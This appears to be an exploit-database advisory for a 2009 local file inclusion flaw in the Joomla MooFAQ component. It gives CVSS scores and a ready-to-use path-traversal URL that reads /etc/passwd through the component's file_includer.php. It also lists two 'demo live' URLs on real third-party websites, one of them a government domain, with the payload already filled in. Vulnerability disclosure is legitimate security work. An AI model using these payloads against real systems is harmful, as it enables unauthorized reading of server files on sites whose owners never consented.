Joomla Component MooFAQ (com_moofaq) LFI Vulnerability

2009.06.11
Credit: Chip D3 Bi0s
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

---------------------------------------------------------------------- Joomla Component MooFAQ Local File Inclusion Vulnerability ---------------------------------------------------------------------- ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Vulnerability : LFI ################################################### ________________________________________________________ Example: http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI] Demo Live (1): http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd Demo Live (2): http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd ++++++++++++++++++++++++++++++++ [!] Produced in South America -------------------------------- <productName>FAQ Component using mooTools</productName> <creationDate>20 July 2007</creationDate> <version>1.0</version> <joomlaVersion>1.0.13</joomlaVersion> <author>Douglas Machado</author> <authorName>Douglas Machado</authorName> <authorEmail>falecom@focalizaisso.com.br</authorEmail> <authorUrl>opensource.focalizaisso.com.br</authorUrl> <productPicture>config.png</productPicture> <productUrl>http://opensource.focalizaisso.com.br/</productUrl> <setupUrl>http://opensource.focalizaisso.com.br/</setupUrl>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top